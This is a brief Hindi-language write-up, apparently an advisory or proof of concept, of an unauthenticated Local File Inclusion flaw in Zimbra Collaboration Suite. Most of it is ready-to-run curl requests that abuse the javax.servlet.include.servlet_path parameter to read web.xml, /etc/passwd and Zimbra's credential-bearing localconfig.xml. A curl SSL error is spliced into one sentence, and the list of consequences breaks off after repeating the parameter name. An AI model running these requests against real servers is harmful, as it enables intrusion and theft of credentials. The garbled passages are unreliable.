
CVE-2025-68645
यह दस्तावेज़ Zimbra Collaboration Suite को प्रभावित करने वाली एक Local File Inclusion (LFI) भेद्यता का वर्णन करता है।
समस्या निम्नलिखित पैरामीटर के अनुचित प्रबंधन से उत्पन्न होती है:
/h/*?javax.servlet.include.servlet_path=
यह एक अप्रमाणित उपयोगकर्ता को आंतरिक एप्लिकेशन संसाधनों तक पहुँचने की अनुमति देता है।
परीक्षण अनुरोध:
curl -k "https://TARGET/h/rest?javax.servlet.include.servlet_path=/WEB-INF/web.xml"


एकाधिक एंडपॉइंट असुरक्षित पैरामीटर को अलग-अलग तरीके से संसाधित करते हैं।
/h/printcalendar?javax.servlet.include.servlet_path=...
/h/rest की तुलना में बेहतर प्रतिक्रिया विश्वसनीयताSSL: certificate subject name does not match target host
curl -k "https://TARGET/..."
curl -k "https://TARGET/h/printcalendar?javax.servlet.include.servlet_path=/WEB-INF/web.xml"
curl -k "https://TARGET/h/printcalendar?javax.servlet.include.servlet_path=/etc/passwd"
curl -k "https://TARGET/h/printcalendar?javax.servlet.include.servlet_path=/opt/zimbra/conf/localconfig.xml"
सफल शोषण से निम्नलिखित हो सकता है:
javax.servlet.include.servlet_path